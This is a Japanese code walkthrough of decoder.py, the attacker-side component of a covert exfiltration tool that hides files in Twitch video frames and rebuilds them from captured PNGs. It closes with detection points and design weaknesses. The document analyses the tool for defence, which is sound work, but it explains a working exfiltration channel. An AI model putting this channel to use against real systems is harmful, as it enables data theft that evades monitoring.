header_bytes[23:23+FILENAME_FIELD_SIZE] # ← ファイル名フィールド(256バイト) file_name = file_name_bytes[:file_name_length].decode( # ← UTF-8でデコード 'utf-8', errors='replace' # ← デコードエラー時は置換文字 )
(decoder.py 103〜116行目)
int.from_bytes(bytes, 'big'): バイト列を整数に変換する。'big' はビッグエンディアン(上位バイトが先頭)を指定し、エンコーダの .to_bytes(n, 'big') と対応する。
ヘッダの各フィールドの解析: エンコーダで定義された固定オフセットに従って、ヘッダバイト列をスライスしてフィールドごとに解析する。各フィールドの役割は 01_victim.md のセクション 3.2 で詳述した。
errors='replace'(116行目): UTF-8 デコードに失敗した場合、代わりに置換文字(U+FFFD、? のような記号)を挿入する。ストリーミング中の劣化でファイル名フィールドのバイト列が破損した場合の安全策である。
if fallback_used: print(" Overriding header values with fallback parameters.") border_in_header = fb_border # ← フォールバック値で上書き expected_width_from_header = fb_width expected_height_from_header = fb_height # Skip fragments with zero payload. if payload_length == 0: raise ValueError("Invalid fragment: payload length is zero.") header_signature = ( # ← ヘッダシグネチャ(フラグメント一致検証用) expected_width_from_header, expected_height_from_header, border_in_header, file_name )
(decoder.py 118〜137行目)
ヘッダシグネチャ: ヘッダから抽出した 4 つの値(画像幅、画像高さ、外枠太さ、ファイル名)をタプルとして記録する。このシグネチャは、複数のフラグメント画像が同一のデータセットに属するかを検証するために使用される。異なるシグネチャを持つフラグメントは、別のデータ(例: ブランクフレームや他のコマンドの出力)として判定・スキップされる。
4.5 ペイロードグリッドの読み取り
payload_area_top = data_y + HEADER_HEIGHT # ← ペイロード領域上端 payload_area_height = data_height - HEADER_HEIGHT # ← ペイロード領域高さ payload_nibbles = [] for r in range(grid_rows): # ← 行ループ for c in range(grid_cols): # ← 列ループ cell_left = data_x + round(c * data_width / grid_cols) cell_right = data_x + round((c + 1) * data_width / grid_cols) cell_top = payload_area_top + round(r * payload_area_height / grid_rows) cell_bottom = payload_area_top + round((r + 1) * payload_area_height / grid_rows) center_x = (cell_left + cell_right) // 2 # ← セルの水平中央 center_y = (cell_top + cell_bottom) // 2 # ← セルの垂直中央 payload_nibbles.append( # ← 中央ピクセル→ニブル値 color_to_nibble(img.getpixel((center_x, center_y))) ) expected_nibbles = payload_length * 2 # ← 期待ニブル数 = ペイロード長 × 2 if len(payload_nibbles) < expected_nibbles: raise ValueError("Extracted payload is smaller than expected.") payload_bytes = bytearray() for i in range(0, expected_nibbles, 2): # ← 2ニブルずつバイトに結合 payload_bytes.append( (payload_nibbles[i] << 4) | payload_nibbles[i+1] ) return header_frag_index, total_fragments, payload_bytes, file_name, header_signature
(decoder.py 139〜158行目)
ペイロード読み取りのアルゴリズム:
- ペイロード領域をヘッダで指定されたグリッド寸法(
grid_cols×grid_rows)に基づいてセルに分割 - 各セルの中央ピクセルのグレースケール値を
color_to_nibble()でニブル値に変換 - 行優先順(左→右、上→下)でニブルを収集
- ヘッダの
payload_lengthに基づき、有効なニブル数(=payload_length * 2)だけを使用 - 2 ニブルずつ結合してバイト列を復元
グリッド座標の計算方式: エンコーダ側と同一の round() ベースの座標計算を使用する。これにより、浮動小数点の丸め誤差があっても、エンコーダとデコーダで同一の座標が計算されることが保証される。
4.6 main() — フラグメント結合とファイル再構成
def main(): parser = argparse.ArgumentParser( description="Decoder with fallback, extended file name extraction, ..." ) parser.add_argument("input_png", nargs="+", # ← 1つ以上のPNGファイル(位置引数) help="Input PNG file(s) (fragments)") parser.add_argument("--threshold", type=float, default=0.8) # ← マーカー検出しきい値 parser.add_argument("--search_window", type=int, default=100) # ← マーカー探索範囲 parser.add_argument("--debug", action="store_true") # ← デバッグ出力 parser.add_argument("--fallback_width", type=int, default=1920) # ← フォールバック画像幅 parser.add_argument("--fallback_height", type=int, default=1080) # ← フォールバック画像高さ parser.add_argument("--fallback_border", type=int, default=20) # ← フォールバック外枠太さ parser.add_argument("--total_fragments_override", type=int) # ← フラグメント数の上書き parser.add_argument("--use_filename_order", action="store_true") # ← ファイル名順でフラグメント番号を割当 args = parser.parse_args()
(decoder.py 160〜173行目)
nargs="+"(164行目): 1 つ以上の位置引数を受け付ける。attacker.py からは重複除去済みの PNG ファイル一覧がコマンドライン引数として渡される。
フォールバックパラメータ群: --fallback_width, --fallback_height, --fallback_border はマーカー検出に失敗した場合のフォールバック値。デフォルト値はエンコーダのデフォルト(1920x1080、border=20)と一致している。
--use_filename_order: ファイル名の辞書順でフラグメント番号を割り当てるオプション。ヘッダのフラグメント番号が破損している場合の救済手段。
filenames = sorted(args.input_png) # ← ファイル名でソート fragments = {} # ← {フラグメント番号: ペイロードデータ} file_name_extracted = None # ← 復元されたファイル名 common_header = None # ← 共通ヘッダシグネチャ for i, filename in enumerate(filenames, start=1): # ← 各PNGファイルを処理 try: frag_index, frag_total, frag_data, frag_file_name, header_sig = decode_fragment( filename, args.threshold, args.search_window, args.debug, args.fallback_width, args.fallback_height, args.fallback_border ) if common_header is None: common_header = header_sig # ← 最初のフラグメントのシグネチャを基準に else: if header_sig != common_header: # ← シグネチャ不一致ならスキップ print(f"Skipping {filename}: header signature ... does not match ...") continue if args.use_filename_order: assigned_index = i # ← ファイル名順で番号を割当 frag_index = assigned_index frag_total = len(filenames) else: print(f"File {os.path.basename(filename)} decoded as fragment {frag_index}.") except Exception as e: print(f"Error decoding {filename}: {e}") continue # ← デコード失敗時はスキップ
(decoder.py 175〜209行目)
ヘッダシグネチャによるフィルタリング(192〜196行目): 最初に正常にデコードされたフラグメントのヘッダシグネチャを基準として記録し、以降のフラグメントはこの基準と比較される。シグネチャが一致しないフラグメント(例: ブランクフレーム、別のコマンドの出力画像、破損した画像)はスキップされる。これにより、録画した全フレームの中から目的のデータフラグメントのみが自動的に選別される。
if args.total_fragments_override: frag_total = args.total_fragments_override # ← フラグメント総数の上書き if frag_index in fragments: print(f"Warning: Duplicate fragment index {frag_index} ...") # ← 重複番号の警告 else: fragments[frag_index] = frag_data # ← フラグメントデータを格納 if file_name_extracted is None: file_name_extracted = frag_file_name # ← ファイル名を記録(最初の1回のみ)
(decoder.py 211〜218行目)
# Ensure we have all fragments based on the collected keys. if not fragments: raise ValueError("No valid fragments found.") sorted_keys = sorted(fragments.keys()) # ← フラグメント番号でソート full_data = bytearray() for key in sorted_keys: full_data.extend(fragments[key]) # ← ペイロードを番号順に結合 if file_name_extracted is None or file_name_extracted == "": raise ValueError("No valid file name found in fragment headers.") output_file = file_name_extracted # ← ヘッダから取得したファイル名で保存 with open(output_file, "wb") as f: f.write(full_data) # ← バイナリモードで書き出し print(f"Reconstructed data saved to {output_file}")
(decoder.py 220〜233行目)
フラグメント結合: 全てのフラグメントのペイロードをフラグメント番号の昇順に結合し、元のファイルを復元する。結合されたデータは、ヘッダから抽出されたファイル名でバイナリモード("wb")で保存される。
# Cleanup: delete blank.png and any file ending with -0001.png for f in glob.glob("blank.png"): try: os.remove(f) # ← blank.pngを削除 print(f"Deleted {f}") except Exception as e: print(f"Error deleting {f}: {e}") for f in glob.glob("*-0001.png"): try: os.remove(f) # ← 最初のフレーム(通常ブランク)を削除 print(f"Deleted {f}") except Exception as e: print(f"Error deleting {f}: {e}")
(decoder.py 235〜248行目)
後処理のクリーンアップ: blank.png(Victim 側で生成されるブランクフレーム)と *-0001.png(録画の最初のフレーム、通常はブランクフレームのキャプチャ)を削除する。ただし、Attacker 側で blank.png が存在するのは Victim と同じディレクトリで実行された場合のみであり、通常のリモート使用では Attacker 側に blank.png は存在しない。*-0001.png の削除は、ブランクフレームがヘッダシグネチャ検証でスキップされるはずだが、念のための後処理として実装されている。
コールチェーン(decoder.py 全体):
decoder.py main()
→ argparse でコマンドライン解析
→ sorted(input_png) でファイル名ソート
→ for filename in filenames:
→ decode_fragment(filename, ...)
→ Image.open(filename).convert("L")
→ find_marker_edges(img, threshold, search_window)
→ check_row() / check_col() でマーカー走査
→ (top, bottom, left, right) を返す
→ 安全領域 → データ領域の座標計算
→ extract_header(img, data_x, data_y, data_width)
→ 558セルの中央ピクセル → ニブル列
→ ニブル列 → 279バイトのヘッダ
→ ヘッダ解析(payload_length, grid, fragment, filename)
→ ペイロードグリッド読み取り
→ 各セルの中央ピクセル → ニブル列
→ ニブル列 → payload_bytes
→ ヘッダシグネチャで一致検証
→ fragments[frag_index] = payload_bytes
→ sorted(fragments.keys()) でフラグメント番号順にソート
→ full_data = 全フラグメントのペイロードを結合
→ open(file_name, "wb").write(full_data) ... ファイル再構成
参照
| ID | タイトル | URL | 対応箇所 |
|---|---|---|---|
| 1 | Pillow Image Module — Pillow docs | https://pillow.readthedocs.io/en/stable/reference/Image.html | Image.open, convert, getpixel |
| 2 | int.from_bytes — Python docs | https://docs.python.org/3/library/stdtypes.html#int.from_bytes | バイト列→整数変換 |
| 3 | hashlib — Python docs | https://docs.python.org/3/library/hashlib.html | SHA-256(attacker.pyでの重複除去) |
5. Attacker側の弱点・改善余地・検知ポイント
5.1 検知ポイント
| 検知ポイント | 検知手法 | 説明 |
|---|---|---|
| streamlink プロセス | プロセス監視(EDR) | streamlink --stream-url の実行は、Twitch ストリームの URL 抽出というセキュリティ上異常な挙動 |
| ffmpeg フレームキャプチャ | プロセス監視 | ffmpeg -i [m3u8 URL] -vf fps=1 は自動的な映像録画を示す |
| IRC 接続 | ネットワーク監視 | irc.chat.twitch.tv:6667 への平文 TCP 接続 |
| Base64 メッセージ | IRC トラフィック解析 | チャットに送信される Base64 文字列は統計的に検知可能 |
| 大量の PNG 生成・削除 | ファイルシステム監視 | 短時間での大量 PNG 生成と SHA-256 ベースの削除パターン |
5.2 設計上の弱点
制御シグナルの脆弱性:
"OK"/"READY"の制御メッセージは暗号化もエンコードもされておらず、IRC チャットの他の参加者が偽のメッセージを送信してプロトコルを妨害(スプーフィング攻撃)できる。例えば、第三者が"READY"を送信すると、Attacker は Victim の準備が整う前にストリーム録画を開始してしまう。decoder のファイル名によるパストラバーサルリスク: decoder.py はヘッダから抽出したファイル名をそのまま
open(output_file, "wb")に使用する。エンコーダ側で意図的に../../important_fileのようなパスを埋め込むことで、Attacker のファイルシステム上の任意の場所にファイルを書き込める可能性がある(パストラバーサル攻撃)。ただし、エンコーダ側はos.path.basename()でファイル名部分のみを使用しているため、通常の使用では発生しない。crawler のリトライが無限ループ: ストリーム URL の取得に失敗した場合、
while Trueで無限にリトライし続ける。Victim が配信を開始しない場合(クラッシュ、ネットワーク切断等)、Attacker は永久にリトライし続ける。重複除去後のフレーム順序: SHA-256 による重複除去は、同一ハッシュのフレームのうち最初に出現したものを保持する。しかし、ストリーミングの開始時や終了時にフレームが不完全にキャプチャされた場合、その不完全なフレームが保持されて完全なフレームが削除される可能性がある。
import reの重複:attacker.pyの 9 行目と 117 行目でimport reが二重に宣言されている。Python のモジュールキャッシュ機構により実害はないが、コードの品質上の問題である。